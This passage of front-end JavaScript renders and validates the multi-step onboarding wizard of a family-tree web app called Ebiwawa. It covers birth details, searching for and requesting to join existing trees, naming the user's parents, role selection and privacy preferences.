                                        </select>
                                    </div>
                                    <div>
                                        <select id="onboard-birth-day" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                            <option value="">Day</option>
                                            ${Array.from({ length: 31 }, (_, i) => i + 1).map(day => `<option value="${day}" ${onboardingState.data.birthDay == day ? 'selected' : ''}>${day}</option>`).join('')}
                                        </select>
                                    </div>
                                </div>
                            </div>

                            <!-- Gender -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Gender *</label>
                                <div class="flex gap-4">
                                    <label class="flex items-center cursor-pointer">
                                        <input type="radio" name="gender" value="male" ${onboardingState.data.gender === 'male' ? 'checked' : ''} class="mr-2">
                                        <span class="text-gray-700">Male</span>
                                    </label>
                                    <label class="flex items-center cursor-pointer">
                                        <input type="radio" name="gender" value="female" ${onboardingState.data.gender === 'female' ? 'checked' : ''} class="mr-2">
                                        <span class="text-gray-700">Female</span>
                                    </label>
                                </div>
                            </div>

                            <!-- Place of Birth -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Place of Birth</label>
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-3 mb-3">
                                    <div>
                                        <label class="block text-xs text-gray-600 mb-1">Country *</label>
                                        ${renderCountryDropdown('onboard-birthCountry', onboardingState.data.birthCountry)}
                                    </div>
                                    <div id="onboard-birthState-container">
                                        <label class="block text-xs text-gray-600 mb-1">State / Province / Region *</label>
                                        ${renderStateDropdown('onboard-birthState', onboardingState.data.birthCountry, onboardingState.data.birthState)}
                                    </div>
                                </div>
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-3">
                                    <div>
                                        <label for="onboard-birth-city" class="block text-xs text-gray-600 mb-1">City *</label>
                                        <input type="text" id="onboard-birth-city" required placeholder="Enter city" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.birthCity || ''}">
                                    </div>
                                    <div>
                                        <label for="onboard-birth-town" class="block text-xs text-gray-600 mb-1">Town (Optional)</label>
                                        <input type="text" id="onboard-birth-town" placeholder="Enter town" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.birthTown || ''}">
                                    </div>
                                </div>
                            </div>

                            <!-- Current Location -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Current Location</label>
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-3 mb-3">
                                    <div>
                                        <label class="block text-xs text-gray-600 mb-1">Country *</label>
                                        ${renderCountryDropdown('onboard-currentCountry', onboardingState.data.currentCountry)}
                                    </div>
                                    <div id="onboard-currentState-container">
                                        <label class="block text-xs text-gray-600 mb-1">State / Province / Region *</label>
                                        ${renderStateDropdown('onboard-currentState', onboardingState.data.currentCountry, onboardingState.data.currentState)}
                                    </div>
                                </div>
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-3">
                                    <div>
                                        <label for="onboard-current-city" class="block text-xs text-gray-600 mb-1">City *</label>
                                        <input type="text" id="onboard-current-city" required placeholder="Enter city" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.currentCity || ''}">
                                    </div>
                                    <div>
                                        <label for="onboard-current-town" class="block text-xs text-gray-600 mb-1">Town (Optional)</label>
                                        <input type="text" id="onboard-current-town" placeholder="Enter town" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.currentTown || ''}">
                                    </div>
                                </div>
                            </div>

                            <!-- Profile Picture -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Profile Picture</label>
                                <div class="flex items-center gap-4">
                                    <div id="avatar-preview" class="w-24 h-24 bg-gray-200 rounded-full flex items-center justify-center overflow-hidden">
                                        ${onboardingState.data.profileAvatarType === 'dicebear'
                                            ? `<img src="${generateDiceBearAvatarUrl(onboardingState.data.profileAvatarSeed, 'avataaars', onboardingState.data.profileAvatarSkin)}" alt="Avatar" class="w-24 h-24 rounded-full">`
                                            : '<span class="text-gray-400 text-xs">No photo</span>'
                                        }
                                    </div>
                                    <div class="flex flex-col gap-2">
                                        <button type="button" onclick="ebwOpenPhotoPicker('avatar-upload-input')" class="btn btn-secondary text-sm">Upload Photo</button>
                                        <button type="button" onclick="showAvatarPicker()" class="btn btn-ghost text-sm">Choose Avatar</button>
                                        <button type="button" onclick="skipAvatar()" class="text-primary hover:underline text-sm">I'll add this later</button>
                                    </div>
                                </div>
                                <input type="file" id="avatar-upload-input" accept="image/*" class="hidden" onchange="handleAvatarUpload(event)">
                            </div>
                        </div>
                    `;
                    break;

                case 2: // Search for Existing Family Trees
                    stepHTML = `
                        <div class="space-y-6">
                            <div>
                                <h2 class="text-2xl font-semibold text-gray-800 mb-2">Is your family already on Ebiwawa?</h2>
                                <p class="text-sm text-gray-500">Let's check if someone in your family has already created a tree</p>
                            </div>

                            <!-- Search Box -->
                            <div class="bg-gray-50 p-6 rounded-lg">
                                <label class="block text-sm font-medium text-gray-700 mb-3">Search by family name:</label>
                                <div class="flex gap-3">
                                    <input type="text" id="tree-search-input" placeholder="Enter the family name to search (e.g., ${onboardingState.data.userLastName || 'Doe'})" class="flex-1 px-4 py-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <button type="button" onclick="searchFamilyTrees()" class="btn btn-primary px-6" id="search-trees-btn">Search</button>
                                </div>
                            </div>

                            <!-- Search Results -->
                            <div id="tree-search-results" class="space-y-3">
                                <!-- Results will be populated here -->
                            </div>

                            <p class="text-xs text-gray-500 text-center pt-2">
                                Don't see your family? Click <strong>Continue</strong> below to set up your own tree.
                            </p>
                        </div>
                    `;
                    break;

                case 3: // Branches: relationship to tree owner (join path) OR parents + tree name (own-tree path)
                    if (onboardingState.data.selectedTreeId) {
                        // Join path: ask how the user is related to the tree owner.
                        // This populates ConnectionRequest.relationshipType so when the
                        // owner accepts, a real family relationship lands in Neo4j.
                        const ownerLabel = onboardingState.data.selectedTreeOwnerName || 'the tree owner';
                        const treeLabel = onboardingState.data.selectedTreeName || 'the family tree';
                        stepHTML = `
                            <div class="space-y-6">
                                <div>
                                    <h2 class="text-2xl font-semibold text-gray-800 mb-2">How are you related?</h2>
                                    <p class="text-sm text-gray-500">
                                        You're requesting to join <strong>${treeLabel}</strong>.
                                        Tell ${ownerLabel} how you're related so they can place you on the tree when they accept.
                                    </p>
                                </div>

                                <div class="bg-gray-50 p-5 rounded-lg space-y-4">
                                    <div>
                                        <label class="block text-sm font-medium text-gray-700 mb-1">
                                            I am ${ownerLabel}'s…
                                        </label>
                                        <select id="onboard-join-relationship" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                            <option value="">Select relationship...</option>
                                            <option value="child" ${onboardingState.data.joinRelationship === 'child' ? 'selected' : ''}>child</option>
                                            <option value="parent" ${onboardingState.data.joinRelationship === 'parent' ? 'selected' : ''}>parent</option>
                                            <option value="sibling" ${onboardingState.data.joinRelationship === 'sibling' ? 'selected' : ''}>sibling</option>
                                            <option value="spouse" ${onboardingState.data.joinRelationship === 'spouse' ? 'selected' : ''}>spouse / partner</option>
                                            <option value="grandparent" ${onboardingState.data.joinRelationship === 'grandparent' ? 'selected' : ''}>grandparent</option>
                                            <option value="grandchild" ${onboardingState.data.joinRelationship === 'grandchild' ? 'selected' : ''}>grandchild</option>
                                            <option value="aunt-uncle" ${onboardingState.data.joinRelationship === 'aunt-uncle' ? 'selected' : ''}>aunt / uncle</option>
                                            <option value="niece-nephew" ${onboardingState.data.joinRelationship === 'niece-nephew' ? 'selected' : ''}>niece / nephew</option>
                                            <option value="cousin" ${onboardingState.data.joinRelationship === 'cousin' ? 'selected' : ''}>cousin</option>
                                            <option value="other" ${onboardingState.data.joinRelationship === 'other' ? 'selected' : ''}>other relation</option>
                                        </select>
                                    </div>

                                    <div>
                                        <label class="block text-sm font-medium text-gray-700 mb-1">
                                            Add a short message (optional)
                                        </label>
                                        <textarea id="onboard-join-message" rows="3" placeholder="Hi! I'd love to be added to the family tree..." class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">${onboardingState.data.joinMessage || ''}</textarea>
                                    </div>
                                </div>

                                <p class="text-center text-xs text-gray-500">
                                    Actually, I'd rather
                                    <a href="#" onclick="event.preventDefault(); switchToOwnTreeFromJoin();" class="text-primary font-medium hover:underline">create my own tree instead</a>.
                                </p>
                            </div>
                        `;
                    } else {
                        // Own-tree path: ask for parents + tree name (existing flow)
                        stepHTML = `
                            <div class="space-y-6">
                                <div>
                                    <h2 class="text-2xl font-semibold text-gray-800 mb-2">Let's make your first connection</h2>
                                    <p class="text-sm text-gray-500">A family tree starts with the people who connect to you. This is the first step in "family sourcing."</p>
                                </div>

                                <!-- Mother Section -->
                                <div class="bg-gray-50 p-5 rounded-lg">
                                    <label class="block text-base font-medium text-gray-800 mb-3">My Mother's Full Name:</label>
                                    <div class="grid grid-cols-1 sm:grid-cols-2 gap-3">
                                        <div>
                                            <input type="text" id="onboard-mother-first-name" placeholder="First Name" onblur="lookupRelativeOnPlatform('mother')" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.motherFirstName || ''}">
                                        </div>
                                        <div>
                                            <input type="text" id="onboard-mother-last-name" placeholder="Last Name (Maiden Name)" onblur="lookupRelativeOnPlatform('mother')" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.motherLastName || ''}">
                                        </div>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-2">If she's on Ebiwawa, we'll suggest a connection. You can add more details for her later.</p>
                                    <div id="onboard-mother-suggest" class="mt-2 hidden"></div>
                                </div>

                                <!-- Father Section -->
                                <div class="bg-gray-50 p-5 rounded-lg">
                                    <label class="block text-base font-medium text-gray-800 mb-3">My Father's Full Name:</label>
                                    <div class="grid grid-cols-1 sm:grid-cols-2 gap-3">
                                        <div>
                                            <input type="text" id="onboard-father-first-name" placeholder="First Name" onblur="lookupRelativeOnPlatform('father')" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.fatherFirstName || ''}">
                                        </div>
                                        <div>
                                            <input type="text" id="onboard-father-last-name" placeholder="Last Name" onblur="lookupRelativeOnPlatform('father')" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.fatherLastName || ''}">
                                        </div>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-2">If he's on Ebiwawa, we'll suggest a connection. You can add more details for him later.</p>
                                    <div id="onboard-father-suggest" class="mt-2 hidden"></div>
                                </div>

                                <!-- Family Tree Name -->
                                <div>
                                    <label class="block text-sm font-medium text-gray-700 mb-1">Family Tree Name</label>
                                    <div class="flex gap-2">
                                        <input type="text" id="onboard-tree-name" placeholder="${onboardingState.data.userLastName ? `The ${onboardingState.data.userLastName} Family` : 'The [Your Last Name] Family'}" class="flex-1 px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${onboardingState.data.treeName || ''}">
                                        <button type="button" onclick="useDefaultTreeName()" class="btn btn-secondary text-sm whitespace-nowrap">Use Default</button>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-1">
                                        Suggested: <span class="font-medium text-gray-700">The ${onboardingState.data.userLastName || '[Your Last Name]'} Family</span>
                                        ${onboardingState.data.treeName ? '' : '. Leave blank to use it, or type your own.'}
                                    </p>
                                </div>
                            </div>
                        `;
                    }
                    break;

                case 4: // What Role Will You Play?
                    stepHTML = `
                        <div class="space-y-6">
                            <div>
                                <h2 class="text-2xl font-semibold text-gray-800 mb-2">What role will you play?</h2>
                                <p class="text-sm text-gray-500">This helps us personalize your experience</p>
                            </div>

                            <div class="space-y-3">
                                <p class="text-base font-medium text-gray-700 mb-4">I'm here to be our family's...</p>

                                <label id="role-label-historian" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.userRole === 'historian' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="user-role" value="historian" ${onboardingState.data.userRole === 'historian' ? 'checked' : ''} class="mt-1 mr-3" onchange="updateUserRole(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">The Historian</div>
                                        <div class="text-sm text-gray-600">I want to build our tree and track our lineage.</div>
                                    </div>
                                </label>

                                <label id="role-label-story-keeper" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.userRole === 'story-keeper' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="user-role" value="story-keeper" ${onboardingState.data.userRole === 'story-keeper' ? 'checked' : ''} class="mt-1 mr-3" onchange="updateUserRole(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">The Story Keeper</div>
                                        <div class="text-sm text-gray-600">I want to save our photos, recipes, and memories.</div>
                                    </div>
                                </label>

                                <label id="role-label-connector" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.userRole === 'connector' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="user-role" value="connector" ${onboardingState.data.userRole === 'connector' ? 'checked' : ''} class="mt-1 mr-3" onchange="updateUserRole(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">The Connector</div>
                                        <div class="text-sm text-gray-600">I want to bring our family members together.</div>
                                    </div>
                                </label>

                                <label id="role-label-exploring" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.userRole === 'exploring' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="user-role" value="exploring" ${onboardingState.data.userRole === 'exploring' ? 'checked' : ''} class="mt-1 mr-3" onchange="updateUserRole(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">I'm Just Exploring!</div>
                                        <div class="text-sm text-gray-600">I'm here to look around and discover.</div>
                                    </div>
                                </label>
                            </div>
                        </div>
                    `;
                    break;

                case 5: // Phase 3: privacy preferences
                    stepHTML = `
                        <div class="space-y-6">
                            <div>
                                <h2 class="text-2xl font-semibold text-gray-800 mb-2">Choose what's visible to your family</h2>
                                <p class="text-sm text-gray-500">You can change this anytime in Settings.</p>
                            </div>

                            <div class="space-y-3">
                                <label id="privacy-label-visible" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.privacyMode === 'visible' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="privacy-mode" value="visible" ${onboardingState.data.privacyMode === 'visible' ? 'checked' : ''} class="mt-1 mr-3" onchange="updatePrivacyChoice(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">Visible to family members in this tree</div>
                                        <div class="text-sm text-gray-600">Other members can see your dates, location, and photos.</div>
                                    </div>
                                </label>

                                <label id="privacy-label-private" class="flex items-start p-4 border-2 rounded-lg cursor-pointer transition-all hover:border-primary hover:bg-gray-50 ${onboardingState.data.privacyMode === 'private' ? 'border-primary bg-primary bg-opacity-5' : 'border-gray-200'}">
                                    <input type="radio" name="privacy-mode" value="private" ${onboardingState.data.privacyMode === 'private' ? 'checked' : ''} class="mt-1 mr-3" onchange="updatePrivacyChoice(this.value)">
                                    <div>
                                        <div class="font-semibold text-gray-800">Private — show only my name and relationship</div>
                                        <div class="text-sm text-gray-600">Other members see only your name and how you're related to them. You can change this anytime in Settings.</div>
                                    </div>
                                </label>
                            </div>
                        </div>
                    `;
                    break;
            }

            stepsContainer.innerHTML = stepHTML;
        }

        function updatePrivacyChoice(value) {
            if (value !== 'visible' && value !== 'private') return;
            onboardingState.data.privacyMode = value;
            const visLabel = document.getElementById('privacy-label-visible');
            const privLabel = document.getElementById('privacy-label-private');
            const active = 'border-primary bg-primary bg-opacity-5';
            const inactive = 'border-gray-200';
            if (visLabel && privLabel) {
                if (value === 'visible') {
                    visLabel.className = visLabel.className.replace(inactive, active);
                    privLabel.className = privLabel.className.replace(active, inactive);
                } else {
                    privLabel.className = privLabel.className.replace(inactive, active);
                    visLabel.className = visLabel.className.replace(active, inactive);
                }
            }
        }

        function collectStepData(step) {
            switch(step) {
                case 1: // Tell Us About You
                    // Name: reads from Step 1 inputs (added 2026-09-12). Falls back to any state
                    // already populated by handleSignup / _handleIdpPostSignin so a user who
                    // doesn't touch the fields keeps the values captured at auth-time.
                    {
                        const firstEl = document.getElementById('onboard-user-first-name');
                        const middleEl = document.getElementById('onboard-user-middle-name');
                        const lastEl = document.getElementById('onboard-user-last-name');
                        if (firstEl) onboardingState.data.userFirstName = firstEl.value.trim();
                        if (middleEl) onboardingState.data.userMiddleName = middleEl.value.trim();
                        if (lastEl) onboardingState.data.userLastName = lastEl.value.trim();
                    }
                    onboardingState.data.birthYear = document.getElementById('onboard-birth-year')?.value;
                    onboardingState.data.birthMonth = document.getElementById('onboard-birth-month')?.value;
                    onboardingState.data.birthDay = document.getElementById('onboard-birth-day')?.value;
                    onboardingState.data.gender = document.querySelector('input[name="gender"]:checked')?.value;
                    onboardingState.data.birthCity = document.getElementById('onboard-birth-city')?.value.trim();
                    onboardingState.data.birthTown = document.getElementById('onboard-birth-town')?.value.trim();
                    onboardingState.data.birthState = document.getElementById('onboard-birthState')?.value;
                    onboardingState.data.birthCountry = document.getElementById('onboard-birthCountry')?.value;
                    onboardingState.data.currentCity = document.getElementById('onboard-current-city')?.value.trim();
                    onboardingState.data.currentTown = document.getElementById('onboard-current-town')?.value.trim();
                    onboardingState.data.currentState = document.getElementById('onboard-currentState')?.value;
                    onboardingState.data.currentCountry = document.getElementById('onboard-currentCountry')?.value;
                    break;

                case 2: // Tree Search
                    // Data is collected during search interactions
                    break;

                case 3: // Parents (own-tree) OR relationship-to-owner (join path)
                    if (onboardingState.data.selectedTreeId) {
                        onboardingState.data.joinRelationship = document.getElementById('onboard-join-relationship')?.value || '';
                        onboardingState.data.joinMessage = (document.getElementById('onboard-join-message')?.value || '').trim();
                    } else {
                        onboardingState.data.motherFirstName = document.getElementById('onboard-mother-first-name')?.value.trim();
                        onboardingState.data.motherLastName = document.getElementById('onboard-mother-last-name')?.value.trim();
                        onboardingState.data.fatherFirstName = document.getElementById('onboard-father-first-name')?.value.trim();
                        onboardingState.data.fatherLastName = document.getElementById('onboard-father-last-name')?.value.trim();
                        onboardingState.data.treeName = document.getElementById('onboard-tree-name')?.value.trim();
                    }
                    break;

                case 4: // User Role
                    onboardingState.data.userRole = document.querySelector('input[name="user-role"]:checked')?.value || 'exploring';
                    break;

                case 5: // Phase 3: privacy
                    onboardingState.data.privacyMode = document.querySelector('input[name="privacy-mode"]:checked')?.value || 'visible';
                    break;
            }
        }

        function validateStep(step) {
            switch(step) {
                case 1: // Tell Us About You
                    if (!onboardingState.data.userFirstName || onboardingState.data.userFirstName.length < 2) {
                        throw new Error("Please enter your first name (at least 2 characters)");
                    }
                    if (!onboardingState.data.userLastName || onboardingState.data.userLastName.length < 2) {
                        throw new Error("Please enter your last name (at least 2 characters)");
                    }
                    if (!onboardingState.data.birthYear || !onboardingState.data.birthMonth || !onboardingState.data.birthDay) {
                        throw new Error("Please enter your complete date of birth");
                    }

                    // Check age is at least 13
                    const birthDate = new Date(onboardingState.data.birthYear, onboardingState.data.birthMonth - 1, onboardingState.data.birthDay);
                    const age = Math.floor((new Date() - birthDate) / (365.25 * 24 * 60 * 60 * 1000));
                    if (age < 13) {
                        throw new Error("You must be at least 13 years old to use this service");
                    }

                    if (!onboardingState.data.gender) {
                        throw new Error("Please select your gender");
                    }

                    if (!onboardingState.data.birthCity || !onboardingState.data.birthState || !onboardingState.data.birthCountry) {
                        throw new Error("Please enter your complete place of birth");
                    }

                    if (!onboardingState.data.currentCity || !onboardingState.data.currentState || !onboardingState.data.currentCountry) {
                        throw new Error("Please enter your complete current location");
                    }
                    break;

                case 2: // Tree Search (optional - can skip)
                    break;

                case 3: // Parents (optional)
                    break;

                case 4: // User Role (optional)
                    break;

                case 5: // Privacy (has a default; no validation)
                    break;
            }
        }

        function updateBirthDays() {
            const year = document.getElementById('onboard-birth-year')?.value;
            const month = document.getElementById('onboard-birth-month')?.value;
            const daySelect = document.getElementById('onboard-birth-day');

            if (daySelect && year && month) {
                const days = getDayOptions(month, year);
                const currentValue = daySelect.value;
                daySelect.innerHTML = '<option value="">Day</option>' +
                    days.map(day => `<option value="${day}" ${currentValue == day ? 'selected' : ''}>${day}</option>`).join('');
            }
        }

        function updateProgress() {
            // Q5: invited users skip the tree-search + own-tree-setup steps
            // (2 + 3). Virtualise the display so the wizard reads as 2 steps,
            // not 4 with gaps.
            const joined = !!onboardingState.joinedExistingTree;
            // Joined path is a virtualised 3-step flow: Step 1 (about you), Step 4
            // (role), Step 5 (privacy). Everything else (tree search, own-tree
            // setup) is skipped for invitees.
            let displayedStep;
            if (joined) {
                displayedStep = onboardingState.currentStep === 5 ? 3
                              : onboardingState.currentStep === 4 ? 2
                              : 1;
            } else {
                displayedStep = onboardingState.currentStep;
            }
            const displayedTotal = joined ? 3 : onboardingState.totalSteps;
            const progress = Math.round((displayedStep / displayedTotal) * 100);
            document.getElementById('progress-bar').style.width = `${progress}%`;
            document.getElementById('progress-percent').textContent = progress;
            document.getElementById('progress-text').textContent = `Step ${displayedStep} of ${displayedTotal}`;

            // Update buttons
            const prevBtn = document.getElementById('prev-btn');
            const skipBtn = document.getElementById('skip-btn');
            const nextBtn = document.getElementById('next-btn');

            prevBtn.style.display = onboardingState.currentStep > 1 ? 'block' : 'none';
            // Skip button: hide on Step 1 (nothing to skip), Step 2 (Continue
            // already advances to own-tree creation), the final step (redundant
            // with Complete ✓), and join-path Steps 3-4 (questions there are
            // short and Skip clutters the decision). Q5: also hide for invited
            // users — the 2-step virtual flow has nothing skippable.
            const isJoinPath = !!onboardingState.data.selectedTreeId;
            // Only show Skip on Step 3 for the own-tree path. Privacy (Step 5)
            // is an explicit choice per Phase 3 brief — skipping past Step 4
            // would bypass it. Join-path and joined (invitee) path never see Skip.
            skipBtn.style.display = (
                !joined &&
                !isJoinPath &&
                onboardingState.currentStep === 3
            ) ? 'block' : 'none';
            skipBtn.textContent = "Skip remaining steps";
            // Final step label varies by completion path. For invited users
            // the "last raw step" is 4 (after we skipped 2+3), and the action
            // is "Join family tree".
            if (onboardingState.currentStep === onboardingState.totalSteps) {
                if (joined) {
                    nextBtn.textContent = 'Join family tree';
                } else if (isJoinPath) {
                    nextBtn.textContent = 'Send my request';
                } else {
                    nextBtn.textContent = 'Complete ✓';
                }
            } else {
                nextBtn.textContent = 'Continue →';
            }
        }

        async function nextOnboardingStep() {
            const errorDiv = document.getElementById('onboarding-error');
            errorDiv.textContent = '';

            try {
                // Collect current step data
                collectStepData(onboardingState.currentStep);

                // Validate current step
                validateStep(onboardingState.currentStep);

                // If last step, complete onboarding
                console.log(`Current step: ${onboardingState.currentStep}, Total steps: ${onboardingState.totalSteps}`);
                if (onboardingState.currentStep >= onboardingState.totalSteps) {
                    console.log('Last step reached, completing onboarding...');
                    await completeOnboarding();
                    return;
                }

                // Save progress before moving to next step
                saveOnboardingProgress();

                // Move to next step
                onboardingState.currentStep++;
                // Q5: invited users skip the tree-search (2) and own-tree
                // setup (3) steps — jump straight to the role step (4).
                if (onboardingState.joinedExistingTree &&
                    (onboardingState.currentStep === 2 || onboardingState.currentStep === 3)) {
                    onboardingState.currentStep = 4;
                }
                renderOnboardingStep(onboardingState.currentStep);
                updateProgress();

            } catch (error) {
                errorDiv.textContent = error.message || "An error occurred. Please try again.";
                console.error('Onboarding step error:', error);
            }
        }

        function previousOnboardingStep() {
            if (onboardingState.currentStep > 1) {
                collectStepData(onboardingState.currentStep);
                saveOnboardingProgress();
                // Q5: invited users' virtual 2-step flow — Back from step 4
                // returns to step 1 (steps 2 + 3 don't exist for them).
                if (onboardingState.joinedExistingTree && onboardingState.currentStep === 4) {
                    onboardingState.currentStep = 1;
                } else {
                    onboardingState.currentStep--;
                }
                renderOnboardingStep(onboardingState.currentStep);
                updateProgress();
            }
        }

        async function skipCurrentStep() {
            // Save current data
            collectStepData(onboardingState.currentStep);
            saveOnboardingProgress();

            // Skip from Step 3 (own-tree parents/tree-name): still route through
            // Step 5 (privacy) — that choice must be explicit per Phase 3 brief,
            // never defaulted-past.
            if (onboardingState.currentStep === 3) {
                onboardingState.currentStep = 5;
                renderOnboardingStep(5);
                updateProgress();
                return;
            }
            if (onboardingState.currentStep >= 2) {
                await completeOnboarding();
            }
        }

        function updateUserRole(role) {
            onboardingState.data.userRole = role;

            // Update button highlighting directly
            const roles = ['historian', 'story-keeper', 'connector', 'exploring'];
            roles.forEach(r => {
                const label = document.getElementById(`role-label-${r}`);
                if (label) {
                    if (r === role) {
                        // Highlight selected role
                        label.classList.remove('border-gray-200');
                        label.classList.add('border-primary', 'bg-primary', 'bg-opacity-5');
                    } else {
                        // Remove highlighting from others
                        label.classList.remove('border-primary', 'bg-primary', 'bg-opacity-5');
                        label.classList.add('border-gray-200');
                    }
                }
            });
        }

        // Tree Search Functions
        async function searchFamilyTrees() {
            const searchInput = document.getElementById('tree-search-input');
            const searchBtn = document.getElementById('search-trees-btn');
            const resultsContainer = document.getElementById('tree-search-results');
            const errorDiv = document.getElementById('onboarding-error');

            const lastName = searchInput.value.trim();

            if (!lastName || lastName.length < 2) {
                errorDiv.textContent = 'Please enter at least 2 characters to search';
                return;
            }

            try {
                searchBtn.disabled = true;
                searchBtn.textContent = 'Searching...';
                errorDiv.textContent = '';

                const response = await fetch(`${API_BASE_URL}/family-trees/search?lastName=${encodeURIComponent(lastName)}`);

                if (!response.ok) {
                    throw new Error('Search failed');
                }

                const data = await response.json();

                // Display results
                if (data.trees && data.trees.length > 0) {
                    resultsContainer.innerHTML = `
                        <div class="mb-3">
                            <p class="text-sm font-medium text-gray-700">Found ${data.count} family tree${data.count > 1 ? 's' : ''}:</p>
                        </div>
                        ${data.trees.map(tree => `
                            <div class="border border-gray-300 rounded-lg p-4 hover:border-primary transition-colors">
                                <div class="flex items-start justify-between">
                                    <div class="flex-1">
                                        <h3 class="font-semibold text-gray-800">${escapeHtml(tree.treeName || '')}</h3>
                                        <p class="text-sm text-gray-600 mt-1">
                                            Created by ${escapeHtml(tree.creatorFirstName || tree.creatorName || 'Unknown')} ${escapeHtml(tree.creatorLastName || '')}
                                        </p>
                                        <div class="flex items-center gap-4 mt-2 text-xs text-gray-500">
                                            <span class="inline-flex items-center gap-1">${tablerIcon('users', { size: 14 })} ${tree.memberCount} member${tree.memberCount !== 1 ? 's' : ''}</span>
                                            ${tree.location ? `<span class="inline-flex items-center gap-1">${tablerIcon('map-pin', { size: 14 })} ${escapeHtml(tree.location)}</span>` : ''}
                                        </div>
                                    </div>
                                    <button type="button" data-tree-id="${tree.treeId}" data-tree-name="${escapeHtml(tree.treeName || '')}" data-creator-id="${tree.creatorId}" data-creator-name="${escapeHtml([tree.creatorFirstName || tree.creatorName || '', tree.creatorLastName || ''].filter(Boolean).join(' ').trim())}" onclick="selectTreeToJoinFromButton(this)" class="btn btn-primary text-sm px-4 py-2">
                                        Request to Join
                                    </button>
                                </div>
                            </div>
                        `).join('')}
                    `;
                } else {
                    resultsContainer.innerHTML = `
                        <div class="text-center py-8">
                            <p class="text-gray-600 mb-2">No family trees found for "${escapeHtml(lastName)}"</p>
                            <p class="text-sm text-gray-500">Try searching with a different name, or click below to continue.</p>
                        </div>
                    `;
                }
            } catch (error) {
                console.error('Search error:', error);
                errorDiv.textContent = 'Failed to search. Please try again.';
            } finally {
                searchBtn.disabled = false;
                searchBtn.textContent = 'Search';
            }
        }

        // Step 2: Selecting a tree to join. We DON'T send the connection-request
        // yet — that happens at the end of the wizard so the user can also tell
        // us their relationship to the owner and add a message (Step 3) before
        // the request is actually committed. Selecting just stores the choice
        // and immediately advances to Step 3.
        //
        // Called from the per-result button via selectTreeToJoinFromButton(this)
        // which reads data-* attributes. We do that rather than embedding the
        // values directly in the onclick attribute so tree/owner names with
        // quotes or apostrophes don't break the HTML.
        function selectTreeToJoinFromButton(btn) {
            const treeId = parseInt(btn.dataset.treeId, 10);
            const treeName = btn.dataset.treeName || '';
            const creatorId = parseInt(btn.dataset.creatorId, 10);
            const creatorName = btn.dataset.creatorName || '';
            selectTreeToJoin(treeId, treeName, creatorId, creatorName);
        }

        // Called from the link on Step 3 (join path) when the user changes
        // their mind and wants to create their own tree instead. Clears the
        // selected-tree state and re-renders Step 3 in own-tree mode.
        function switchToOwnTreeFromJoin() {
            onboardingState.data.selectedTreeId = null;
            onboardingState.data.selectedTreeName = null;
            onboardingState.data.selectedTreeOwnerId = null;
            onboardingState.data.selectedTreeOwnerName = null;
            onboardingState.data.joinRelationship = null;
            onboardingState.data.joinMessage = null;
            saveOnboardingProgress();
            renderOnboardingStep(onboardingState.currentStep);
            updateProgress();
        }

        function selectTreeToJoin(treeId, treeName, creatorId, creatorName) {
            const errorDiv = document.getElementById('onboarding-error');
            if (!creatorId) {
                if (errorDiv) errorDiv.textContent = 'Cannot select this tree — owner information missing';
                return;
            }
            onboardingState.data.selectedTreeId = treeId;
            onboardingState.data.selectedTreeName = treeName;
            onboardingState.data.selectedTreeOwnerId = creatorId;
            onboardingState.data.selectedTreeOwnerName = creatorName || 'the tree owner';
            onboardingState.data.skipTreeSearch = false;
